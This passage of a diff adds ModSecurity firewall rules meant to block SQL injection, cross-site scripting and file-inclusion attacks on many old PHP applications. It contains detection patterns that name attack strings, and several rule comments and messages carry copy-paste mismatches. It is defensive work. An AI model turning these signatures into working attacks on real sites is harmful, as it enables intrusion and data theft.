+SecRule REQUEST_URI "/thankyou\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390676,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Web2Mail Cross-Site Scripting Vulnerabilities'"
+SecRule ARGS:message|ARGS:ip|ARGS:name "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: CJ Web2Mail Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "/web2mail\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390677,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Web2Mail Cross-Site Scripting Vulnerabilities'"
+SecRule ARGS:emsg "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: postnuke Local file inclusion via GeSHi library
+SecRule REQUEST_URI "/modules/pn_bbcode/pnincludes/contrib/example\.php"         "id:390678,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: postnuke Local file inclusion via GeSHi library'"
+
+
+# Rule 310019: PHP-Fusion "msg_send" SQL Injection Vulnerability
+SecRule REQUEST_URI "/messages\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390679,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Fusion msg_send SQL Injection Vulnerability '"
+SecRule ARGS:msg_send "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union select user_password from fusion_users where user_name|\')"
+
+
+# Rule 310019: SquirrelMail Address Add Plugin "first" Cross-Site Scripting
+SecRule REQUEST_URI "/add\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390680,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SquirrelMail Address Add Plugin first Cross-Site Scripting'"
+SecRule ARGS:first "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: honeypot
+SecRule REQUEST_URI "/tiki-view_forum_thread\.php"         "chain,id:390681,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki forumid RFI injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:forumid "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019: honeypot
+SecRule REQUEST_URI "/index\.php\?page=\|"         "id:390683,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: page argument metacharacter injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: Zomplog Cross-Site Scripting and SQL Injection Vulnerabilities
+SecRule REQUEST_URI "detail\.php" "chain, id:320001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Detail.php id SQL injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\')"
+
+# Rule 310019: Zomplog Cross-Site Scripting and SQL Injection Vulnerabilities
+#SecRule REQUEST_URI "/(?:get|index)\.php"  #"chain, id:320002,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Zomplog SQL injection'"
+#SecRule ARGS:catid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,])"
+
+
+# Rule 310019: Basic Analysis and Security Engine SQL Injection Vulnerability
+#SecRule REQUEST_URI "/base_qry_main\.php\?new=.*&sig\[.*\]=\x3D&sig\[.*\]=(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\')" #"id:320003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Basic Analysis and Security Engine SQL Injection Vulnerability'"
+
+
+# Rule TClanPortal "id" SQL Injection Vulnerability
+SecRule REQUEST_URI "/index\.php" "chain, id:390775,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TClanPortal id SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:id|ARGS:action "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select)"
+
+
+# Rule 310019: SaphpLesson "forumid" SQL Injection Vulnerability
+SecRule REQUEST_URI "/(?:showcat|add)\.php"  "chain,id:320113,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SaphpLesson forumid SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:forumid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\')"
+
+
+# Rule 310019: News2net "category" SQL Injection Vulnerability
+SecRule REQUEST_URI "index\.php"  "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390686,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP id variable SQL injection vulnerability'"
+SecRule ARGS:category "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"
+
+
+
+# Rule 310019: Peel "rubid" SQL Injection Vulnerability
+SecRule REQUEST_URI  "index\.php"  "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393300,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Peel rubid SQL Injection Vulnerability'"
+SecRule ARGS:rubid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
+
+
+# Rule 310019:
+SecRule ARGS:mosconfig_absolute_path "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:393376,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic mosConfig_absolute_path File Inclusion Vulnerability'"
+
+
+# Rule 310019: Cyphor Forum SQL Injection Exploit
+SecRule REQUEST_URI  "show\.php"         "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:392659,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cyphor Forum SQL Injection Exploit'"
+SecRule ARGS:id|ARGS:fid "(?:\'|union.*select)"
+
+
+# Rule 310019: WSN Forum "id" SQL Injection Vulnerability
+SecRule REQUEST_URI  "/memberlist\.php"          "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390659,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WSN Forum id SQL Injection Vulnerability'"
+SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
+
+
+# Rule 310019: Tunez SQL Injection and Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI  "/songinfo\.php"          "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390660,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tunez SQL Injection and Cross-Site Scripting Vulnerabilities'"
+SecRule ARGS:songid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
+
+
+# Rule 310019: phpComasy "id" SQL Injection Vulnerability
+SecRule REQUEST_URI  "/index\.php"  "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390685,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP id variable SQL injection vulnerability'"
+SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"
+
+
+# Rule 310019: sNews "index.php" SQL Injection Vulnerabilities
+SecRule REQUEST_URI  "/index\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:310557,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ActiveCampaign SupportTrio Inclusion Vulnerability'"
+SecRule ARGS:id|ARGS:category "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)"
+
+
+# Rule 310019: phpWordPress SQL Injection Vulnerabilities
+SecRule REQUEST_URI  "/index\.php" 	"chain,id:343433,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Just in Time Virtual Patch:  SQL injection',chain"
+SecRule ARGS:poll|ARGS:category|ARGS:ctg "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: ActiveCampaign KnowledgeBuilder SQL Injection
+SecRule REQUEST_URI  "/index\.php" 	"chain,t:none,t:urlDecodeUni,t:lowercase,id:313979,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: ActiveCampaign KnowledgeBuilder SQL Injection',chain"
+SecRule ARGS:article "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain"
+SecRule REQUEST_URI  "!(/index.php\?act=update&)"  "t:none,t:urlDecodeUni,t:lowercase"
+
+
+# Rule 310019: DMANews Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI  "/index\.php"  "chain,t:none,t:urlDecodeUni,t:lowercase,chain,id:374533,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL injection attack'"
+SecRule ARGS:id|ARGS:sortorder|ARGS:display_num "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: bogus graphics file
+SecRule REQUEST_HEADERS:Content-Disposition "\.php"  "chain,id:310019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Fake gif file shell attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_HEADERS:Content-Type "(?:image/gif|image/jpg|image/png|image/bmp)"
+
+
+# Rule 310019: PhpX <= 3.5.9 SQL Injection -> login bypass -> remote command/code execution
+#SecRule REQUEST_URI "files/.*\.php\.menu\?cmd=" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390658,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpX <= 3.5.9 SQL Injection -> login bypass -> remote command/code execution'"
+
+
+# Rule 310019: Coppermine Photo Gallery "relocate_server.php" Exposure of Configuration
+SecRule REQUEST_URI "/relocate_server\.php"         "id:390205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine Photo Gallery relocate_server.php Exposure of Configuration'"
+
+
+# Rule 310019: WebCalendar http Response Splitting and SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/edit_report_handler\.php"         "chain,id:390206,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebCalendar http Response Splitting and SQL Injection Vulnerabilities'"
+SecRule ARGS:time_range "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: WebCalendar http Response Splitting and SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/layers_toggle\.php"         "chain,id:390207,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebCalendar http Response Splitting and SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:ret "HTTP"
+
+
+# Rule 310019: Zainu SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/index\.php"  "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390684,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zainu SQL Injection Vulnerabilities'"
+SecRule ARGS:start|ARGS:term "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: Cars Portal SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390770,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cars Portal SQL Injection'"
+SecRule ARGS:page|ARGS:car "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from)"
+
+
+# Rule 310019: honeypot
+SecRule REQUEST_URI "/tiki-view_forum_thread\.php" "chain,id:390083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiwiki XSS Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:comments_parentId|ARGS:forumId|ARGS:topics_offset "(<+(script|about|applet|activex|chrome)|onmouseover=\'javascript)"
+
+
+# Rule 310019: honeypot
+SecRule REQUEST_URI "/tiki-view_forum_thread\.php" "chain,id:393382,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiwiki Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:comments_parentId|ARGS:forumId|ARGS:topics_offset "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: honeypot
+SecRule REQUEST_URI "index\.php\?p=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:390208,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic Remote PHP injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: PHPNuke-Clan "vwar_root" File Inclusion Vulnerability
+#VWar <= 1.5.0 R12 Remote File Inclusion Exploit
+SecRule REQUEST_URI "(/includes/functions_(common|install)|/includes/get_header)\.php" "chain,id:390039,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vwar_root remote/local file inclusion',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:vwar_root "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: aWebBB Multiple Vulnerabilities
+SecRule REQUEST_URI "post\.php" "chain,id:390001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB XSS attack on post.php',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:tname|ARGS:fpost "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: aWebBB Multiple Vulnerabilities
+SecRule REQUEST_URI "editac\.php" "chain,id:390002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB XSS attack on editac.php',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:fullname|ARGS:emailadd|ARGS:country|ARGS:sig|ARGS:otherav "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: aWebBB Multiple Vulnerabilities
+SecRule REQUEST_URI "register\.php" "chain,id:390003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB XSS attack on register.php',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:fullname|ARGS:emailadd|ARGS:country "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: aWebBB Multiple Vulnerabilities
+SecRule REQUEST_URI "(?:accounts|changep|editac|feedback|fpass|login|post|reply|reply_log)\.php" "chain,id:390004,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible SQL injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*|\,]|union.*select.*from)"
+
+
+# Rule 310019: aWebBB Multiple Vulnerabilities
+SecRule REQUEST_URI "dpost\.php" "chain,id:391104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB SQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:p "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: aWebBB Multiple Vulnerabilities
+SecRule REQUEST_URI "(?:ndis|list)\.php" "chain,id:390005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBB SQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:c "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from)"
+
+
+# Rule 310019: phpBB "cur_password" Cross-Site Scripting Vulnerability
+SecRule REQUEST_URI "profile\.php" "chain,id:390006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB cur_password XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:cur_password "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
+SecRule REQUEST_URI "modules/vWar_Account/includes/functions_(?:common|front)\.php" "chain,id:390007,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:vwar_root2 "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019: Claroline <= 1.7.4 scormExport.inc.php remote command vuln
+SecRule REQUEST_URI "scormExport\.inc\.php" "chain,id:390008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline <= 1.7.4 scormExport.inc.php remote command vuln',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:includePath "(?:^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Claroline <= 1.7.4 scormExport.inc.php remote command vuln
+SecRule REQUEST_URI "scormExport\.inc\.php\?cmd=" "id:390009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline <= 1.7.4 scormExport.inc.php remote command vuln',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: Claroline <= 1.7.4 XSS and recursion attack
+SecRule REQUEST_URI "rqmkhtml\.php" "chain,id:390010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline <= 1.7.4 XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:cmd "(?:rqEdit|rwEditHtml)" chain
+SecRule ARGS:file "(?:><|\.\./\.\.)"
+
+
+# Rule 310019: aWebNews Multiple Vulnerabilities
+SecRule REQUEST_URI "visview\.php" "chain,id:390011,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebNews XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:yname|ARGS:emailadd|ARGS:subject|ARGS:comment "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: aWebNews Multiple Vulnerabilities
+SecRule REQUEST_URI "(?:login|fpass)\.php" "chain,id:390012,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBBNewsSQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:user123 "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: aWebNews Multiple Vulnerabilities
+SecRule REQUEST_URI "visview\.php" "chain,id:390013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebBBNewsSQL attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:cid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: qliteNews "loginprocess.php" SQL Injection Vulnerability
+SecRule REQUEST_URI "loginprocess\.php" "chain,id:390015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: qliteNEws SQL injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: RedCMS SQL Injection and Script Insertion Vulnerabilities
+SecRule REQUEST_URI "profile\.php" "chain,id:390017,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RedCMS SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:u "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+# Rule 310019: RedCMS SQL Injection and Script Insertion Vulnerabilities
+SecRule REQUEST_URI "register\.php" "chain,id:390018,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RedCMS XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:Email|ARGS:Location|ARGS:Website "(?:javascript|script|about|applet|activex|chrome)*>"
+
+
+# Rule 310019: Oxygen "fid" SQL Injection Vulnerability
+SecRule REQUEST_URI "post\.php" "chain,id:390019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oxygen SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:fid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: Mantis Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "view_set_all\.php" "chain,id:390020,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mantis XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:start_day|ARGS:start_year|ARGS:start_month "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: vCounter "url" SQL Injection Vulnerability
+SecRule REQUEST_URI "vCounter\.php" "chain,id:390021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oxygen SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:url "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: PHP Classifieds "searchword" Cross-Site Scripting Vulnerability
+SecRule REQUEST_URI "search\.php" "chain,id:390022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mantis XSS attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:searchword "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: PHPCollab v2.x / netOffice v2.x sendpassword.php SQL Injection
